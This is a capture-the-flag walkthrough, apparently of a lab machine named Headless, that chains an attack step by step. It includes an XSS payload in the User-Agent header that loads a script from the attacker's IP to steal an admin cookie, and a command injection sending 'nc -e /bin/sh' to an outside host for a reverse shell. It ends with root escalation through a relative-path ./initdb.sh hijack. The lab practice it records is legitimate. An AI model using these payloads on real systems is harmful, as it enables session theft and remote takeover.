The support page has a form we can submit to message staff. When we try an XSS payload we get an error.

 

 

We have XSS in the User-Agent header

 

 

 

POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent:<script src="http://10.10.14.22/script.js"></script> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=test&lname=test&email=test%40test.com&phone=333333333&message=<script>

 

 

 

Using our notes from the XSS lab we create a script.js file and a index.php file. The webserver will reach out to our machine and grab both files and give us the cookie.

 

c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

 

Now we can access /dashboard

 

 

 

 

And we have simple RCE when generating a report

 

 

 

 

 

 

Payload for a shell

POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: InVzZXIi\.uAlmXlTvm8vyihjNaPDWnvB_Zfs; is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1

date=2023-09-15;nc -e /bin/sh 10.10.14.22 9999

 

 

 

 

We can run /usr/bin/syscheck as root

dvir@headless:/tmp/pwn$ cat /usr/bin/systemcheck
cat: /usr/bin/systemcheck: No such file or directory
dvir@headless:/tmp/pwn$ cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
 exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
 /usr/bin/echo "Database service is not running. Starting it..."
 ./initdb.sh 2>/dev/null
else
 /usr/bin/echo "Database service is running."
fi
 

When I first looked at this it runs a file without the full path  as we see here  ./initdb.sh 2>/dev/null

 

I created a rev shell but I forgot to chmod +x it so it never worked. I then figured this wasnt the right path and spent hours looking elsewhere and couldnt find anything.

 

I looked up a guide and saw he did what I did but did chmod first. Once I did that the exploit worked. I am an idiot.